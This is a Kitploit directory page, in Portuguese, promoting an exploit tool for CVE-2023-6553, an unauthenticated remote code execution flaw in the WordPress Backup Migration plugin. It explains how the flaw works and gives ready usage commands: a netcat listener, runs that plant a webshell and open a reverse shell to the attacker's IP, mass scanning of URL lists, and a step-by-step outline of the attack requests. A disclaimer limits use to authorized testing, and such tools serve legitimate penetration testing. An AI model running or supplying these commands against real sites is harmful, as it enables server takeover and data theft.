Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
WordPress_Backup_Migration-RCE_Unauthenticated — Este exploit é baseado no CVE-2023-6553 e foi construído sobre o exploit original por Chocapik, foi adicionado que um shell reverso direto pode ser obtido. | Kitploit
Ferramentas/GitHubGitHub/joaoaugustom/wordpress_backup_migration-rce_unauthenticated
Frameworks de ExploraçãoAnálise de VulnerabilidadesExploração de Aplicações WebTestes de PenetraçãoComando e ControleDesenvolvimento de Payloads
GitHubjoaoaugustom/wordpress_backup_migration-rce_unauthenticated

WordPress_Backup_Migration-RCE_Unauthenticated

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Este exploit é baseado no CVE-2023-6553 e foi construído sobre o exploit original por Chocapik, foi adicionado que um shell reverso direto pode ser obtido.

Ver Repositório
1há 13 diasAinda não revisado

CVE-2023-6553 — O plugin Backup Migration para WordPress - Shell Reverso

Uma versão estendida do exploit CVE-2023-6553 do Chocapikk que adiciona um modo de shell reverso com um único comando sobre o webshell interativo original.


Vulnerabilidade

CVE-2023-6553 — Execução Remota de Código Não Autenticada no plugin Backup Migration do WordPress (versões ≤ 1.3.7).

O plugin expõe backup-heart.php, que lê uma cadeia de filtros PHP do cabeçalho HTTP Content-Dir e a passa para include() sem autenticação ou sanitização. Isso permite que um atacante não autenticado execute código PHP arbitrário injetando uma cadeia php://filter manipulada.

  • CVSS: 9.8 (Crítico)
  • Plugin: Backup Migration ≤ 1.3.7
  • Referência: WPScan

Créditos

Exploit original por Chocapikk — toda a lógica principal de exploração (geração da cadeia de filtros, escrita de arquivo, shell interativo) é trabalho dele. Este repositório apenas o estende com um modo de gatilho de shell reverso.


Diferenças do Original

As únicas adições são:

  1. Método trigger_reverse_shell() — após o webshell ser implantado (mesmo processo do original), envia uma única requisição GET com o comando do shell reverso como parâmetro 0, exatamente como o shell interativo faria.
  2. 4 novos argumentos argparse — para habilitar e configurar o modo de shell reverso.
  3. 5 linhas em main() — substitui interactive_shell() por trigger_reverse_shell() quando -r está presente.

Todo o resto — verificação de vulnerabilidade, loop de escrita de arquivo, cópia/desvinculação, modo interativo, varredura multi-URL — permanece inalterado do original.


Requisitos

root@kitploit:~
pip install requests rich alive-progress prompt-toolkit php-filter-chain

Uso

Modo de shell reverso (novo)

root@kitploit:~
# Start your listener first
rlwrap nc -lvnp 4444

# Run the exploit
python3 exploit.py -u http://TARGET/blog -r -l YOUR_IP -p 4444

Se bash /dev/tcp não estiver disponível no alvo, use mkfifo (depende do nc em vez disso):

root@kitploit:~
python3 exploit.py -u http://TARGET/blog -r -l YOUR_IP -p 4444 --shell mkfifo

Modo de webshell interativo (comportamento original)

root@kitploit:~
python3 exploit.py -u http://TARGET/blog

Apenas verificação de vulnerabilidade

root@kitploit:~
python3 exploit.py -u http://TARGET/blog -c

Escanear uma lista de URLs

root@kitploit:~
python3 exploit.py -f urls.txt -t 10 -o vulnerable.txt

Todos os argumentos

root@kitploit:~
-u / --url      URL base do alvo (ex.: http://target/blog)
-r / --revshell Habilitar modo de shell reverso
-l / --lhost    Seu IP para receber o shell (obrigatório com -r)
-p / --lport    Porta do seu listener (padrão: 4444)
     --shell    Tipo de shell: bash (padrão) ou mkfifo
-c / --check    Apenas verificar vulnerabilidade, não implantar shell
-f / --file     Arquivo com lista de URLs para escanear
-t / --threads  Threads para varredura multi-URL (padrão: 5)
-o / --output   Arquivo de saída para resultados da varredura

Como Funciona

root@kitploit:~
1. POST /wp-content/plugins/backup-backup/includes/backup-heart.php
   Content-Dir: php://filter/...<encoded PHP>
   → Writes webshell char by char to a temp file
   → Copies temp file to <random>.php

2. GET /wp-content/plugins/backup-backup/includes/<random>.php?0=<cmd>
   → Executes command via backtick operator
   → Interactive mode: loops reading commands from stdin
   → Reverse shell mode: sends bash/mkfifo one-liner, connects to listener

3. Cleanup: unlink(<random>.php)

Aviso Legal

Esta ferramenta é destinada apenas para testes de penetração autorizados e pesquisa de segurança. Não a utilize contra sistemas para os quais você não tenha permissão explícita para testar.

Baixar ferramenta
RecursoOriginal (Chocapikk)Esta versão
Webshell interativo✅✅ (inalterado)
Shell reverso❌✅ (-r)
Varredura multi-URL✅✅ (inalterado)
Novos argumentos—-r, -l, -p, --shell